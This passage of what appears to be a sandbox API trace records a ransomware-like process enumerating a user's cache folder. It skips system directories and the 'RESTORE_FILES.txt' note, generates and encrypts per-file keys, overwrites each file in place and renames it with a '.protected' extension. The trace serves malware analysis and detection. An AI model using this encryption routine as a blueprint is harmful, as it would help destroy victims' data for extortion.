halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.protected")) returned 1 [0088.951] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.951] lstrcmpiW 
(lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Windows") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files (x86)") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="$Recycle.bin") returned 1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="System Volume Information") returned -1 [0088.951] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.951] StrStrIW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".protected") returned 0x0 [0088.951] lstrcmpW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="RESTORE_FILES.txt") returned -1 [0088.951] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.951] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.951] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.951] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0088.951] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.952] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".rar") returned 0x0 [0088.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.952] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".zip") returned 0x0 [0088.952] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.952] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.952] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.953] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.953] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.953] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.953] CloseHandle (hObject=0x150) returned 1 [0088.954] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected") returned 162 [0088.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.protected")) returned 1 [0088.954] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Windows") returned -1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files") returned -1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files (x86)") returned -1 [0088.954] 
lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="$Recycle.bin") returned 1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="System Volume Information") returned -1 [0088.954] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.954] StrStrIW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".protected") returned 0x0 [0088.955] lstrcmpW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="RESTORE_FILES.txt") returned -1 [0088.955] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.955] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") 
returned 0x0 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".rar") returned 0x0 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".zip") returned 0x0 [0088.955] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.956] CloseHandle (hObject=0x150) returned 1 [0088.957] 
wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected") returned 162 [0088.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.protected")) returned 1 [0088.976] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Windows") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files (x86)") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="$Recycle.bin") returned 1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="System Volume Information") returned -1 [0088.976] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.976] StrStrIW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".protected") returned 0x0 [0088.976] lstrcmpW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="RESTORE_FILES.txt") returned -1 [0088.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0088.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".rar") returned 0x0 [0088.977] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".zip") returned 0x0 [0088.977] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.978] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.978] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.978] CloseHandle (hObject=0x150) returned 1 [0088.978] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected") returned 162 [0088.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.protected")) returned 1 [0088.979] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Windows") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files (x86)") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="$Recycle.bin") returned 1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="System Volume Information") returned -1 [0088.979] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.979] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".protected") returned 0x0 [0088.979] lstrcmpW 
(lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="RESTORE_FILES.txt") returned -1 [0088.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".rar") returned 0x0 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".zip") returned 0x0 [0088.980] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.981] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.981] CloseHandle (hObject=0x150) returned 1 [0088.981] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected") returned 162 [0088.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.protected")) returned 1 [0088.982] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Windows") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="Program Files (x86)") returned -1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="$Recycle.bin") returned 1 [0088.982] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", lpString2="System Volume Information") returned -1 [0088.982] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 